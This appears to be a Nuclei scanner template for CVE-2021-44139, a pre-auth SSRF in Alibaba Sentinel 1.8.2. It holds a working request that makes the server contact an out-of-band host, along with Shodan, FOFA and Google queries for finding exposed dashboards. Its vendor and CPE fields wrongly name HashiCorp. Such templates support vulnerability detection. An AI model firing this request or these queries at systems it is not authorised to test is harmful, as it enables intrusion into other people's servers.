id: CVE-2021-44139 info: name: Alibaba Sentinel - Server-side request forgery (SSRF) author: DhiyaneshDK severity: high description: | There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter. impact: | Successful exploitation of this vulnerability could allow an attacker to send crafted requests from the server, potentially leading to unauthorized access to internal resources or network scanning. remediation: | Apply the latest security patches or updates provided by Alibaba Sentinel to fix the SSRF vulnerability (CVE-2021-44139). reference: - https://github.com/alibaba/Sentinel/issues/2451 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-44139 cwe-id: CWE-918 epss-score: 0.01303 epss-percentile: 0.85873 cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hashicorp product: sentinel shodan-query: - title:"Sentinel Dashboard" - http.title:"sentinel dashboard" fofa-query: title="sentinel dashboard" google-query: intitle:"sentinel dashboard" tags: cve2021,cve,ssrf,alibaba,oast,misconfig,sentinel,hashicorp http: - method: GET path: - "{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0" matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: word part: header words: - application/json - type: word part: body words: - '"success":true' - '"msg":"success"' condition: and # digest: 4b0a00483046022100eff30e40ed2017143fb8fc2fdd6400505235c5abd034d094e25cf4eefe47ed05022100ff302af2ff8d9982ec1b066859213c009f22ef2e33472d7808511113df739261:922c64590222798bb761d5b6d8e72950